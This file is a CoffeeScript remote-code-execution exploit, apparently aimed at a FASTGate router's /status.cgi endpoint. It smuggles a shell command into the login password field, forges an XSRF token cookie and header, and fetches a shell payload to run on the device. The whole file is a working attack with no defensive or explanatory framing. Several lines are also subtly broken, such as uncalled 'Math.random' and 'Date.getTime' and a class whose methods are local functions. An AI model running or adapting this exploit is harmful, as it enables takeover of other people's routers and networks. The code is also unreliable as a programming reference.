FASTGate-RCE

ajax = (url, params, hdrs) ->
  try
    req = new XMLHttpRequest

    qs = new URLSearchParams
    if params
      `for (const [key, val] of Object.entries(params)) {
        qs.append(key, val);
      }`
      url += "?#{qs.toString()}"

    req.open 'GET', url, 0
    req.setRequestHeader 'X-Requested-With', 'XMLHttpRequest'
    req.setRequestHeader 'Content-type', 'application/x-www-form-urlencoded'
    if hdrs
      `for (const [key, val] of Object.entries(hdrs)) {
        req.setRequestHeader(key, val);
      }`

    req.send()
    if req.status == 200
      req.responseText
    else
      null

  catch
    null

random_string = (len) ->
  ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
  digits = '0123456789'
  letters = ascii_letters + digits
  result = ''
  for i in [0...len]
    result += letters.charAt Math.random() * letters.length
  return result

exploit = (cmd, token) ->
  params = {
    '_': "#{Math.round (new Date).getTime() / 1000}pytester#{random_string 12}",
    'sessionKey': 'NULL',
    'cmd': '3',
    'nvget': 'login_confirm',
    'username': random_string(4),
    'password': "'; #{cmd} ; #"
  }
  hdrs = {
    'X-XSRF-TOKEN': token,
    'DNT': '1',
    'Cookie': document.cookie
  }
  ajax '/status.cgi', params, hdrs

isthisyou = ->
  ajax '/status.cgi', {
    '_': "#{Math.round Date.getTime / 1000}pytester#{random_string 12}"
  }

class @Payload
  set = ->
    this.code = ajax '/payload.shell' if !isthisyou()
    return
  hasnot = ->
    !this.code?
  get = ->
    this.code

mp = new Payload
mp.set() while mp.hasnot()
token = Math.round Math.random * 100000000000
document.cookie = "XSRF-TOKEN=#{token}"
while true
  if isthisyou()
    exploit mp.get(), token
    break